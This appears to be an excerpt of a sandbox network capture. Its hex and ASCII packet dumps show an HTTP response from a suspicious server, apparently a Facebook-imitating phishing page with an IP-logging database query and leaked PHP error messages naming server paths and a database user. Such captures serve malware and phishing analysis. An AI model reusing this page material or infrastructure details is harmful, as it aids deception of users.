2022-10-07 13:59:49 UTC	1051	IN	Data Raw: 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 Data Ascii: E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost&
2022-10-07 13:59:49 UTC	1053	IN	Data Raw: 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 Data Ascii: oved\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00
2022-10-07 13:59:49 UTC	1054	IN	Data Raw: 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 Data Ascii: 20password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u0
2022-10-07 13:59:49 UTC	1056	IN	Data Raw: 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 Data Ascii: 36.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%2
2022-10-07 13:59:49 UTC	1057	IN	Data Raw: 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 Data Ascii: word:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u0025
2022-10-07 13:59:49 UTC	1059	IN	Data Raw: 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 Data Ascii: ;www_list_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%
2022-10-07 13:59:49 UTC	1060	IN	Data Raw: 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 Data Ascii: nt%3E" onclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u
2022-10-07 13:59:49 UTC	1062	IN	Data Raw: 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 Data Ascii: base.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access
2022-10-07 13:59:49 UTC	1063	IN	Data Raw: 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 Data Ascii: er%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%2
2022-10-07 13:59:49 UTC	1065	IN	Data Raw: 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 Data Ascii: C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u00
2022-10-07 13:59:49 UTC	1066	IN	Data Raw: 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 0limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\
2022-10-07 13:59:49 UTC	1068	IN	Data Raw: 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 Data Ascii: ser%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3
2022-10-07 13:59:49 UTC	1069	IN	Data Raw: 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 Data Ascii: 253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource
2022-10-07 13:59:49 UTC	1070	IN	Data Raw: 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 Data Ascii: %20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%
2022-10-07 13:59:49 UTC	1072	IN	Data Raw: 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 Data Ascii: \u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u0
2022-10-07 13:59:49 UTC	1073	IN	Data Raw: 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 Data Ascii: 53E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger
2022-10-07 13:59:49 UTC	1075	IN	Data Raw: 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 Data Ascii: br%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3
2022-10-07 13:59:49 UTC	1076	IN	Data Raw: 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 Data Ascii: 53E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/see
2022-10-07 13:59:49 UTC	1078	IN	Data Raw: 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c Data Ascii: C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a cl
2022-10-07 13:59:49 UTC	1079	IN	Data Raw: 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f Data Ascii: r%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", &quo
